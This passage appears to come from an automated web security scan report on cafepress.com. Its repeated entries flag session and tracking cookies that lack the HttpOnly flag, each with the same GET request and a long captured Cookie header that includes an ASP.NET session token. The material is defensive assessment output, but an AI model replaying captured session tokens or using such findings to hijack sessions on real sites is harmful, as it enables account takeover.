Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.17. http://www.cafepress.com/+framed-prints previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+framed-prints

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+framed-prints HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.18. http://www.cafepress.com/+greeting_cards previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+greeting_cards

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+greeting_cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.19. http://www.cafepress.com/+hats-caps previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+hats-caps

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+hats-caps HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.20. http://www.cafepress.com/+ipad-cases previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+ipad-cases

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+ipad-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.21. http://www.cafepress.com/+iphone-cases previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+iphone-cases

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.22. http://www.cafepress.com/+journals previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+journals

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.23. http://www.cafepress.com/+keepsake_boxes previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+keepsake_boxes

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.24. http://www.cafepress.com/+license_plate_frames previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+license_plate_frames

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
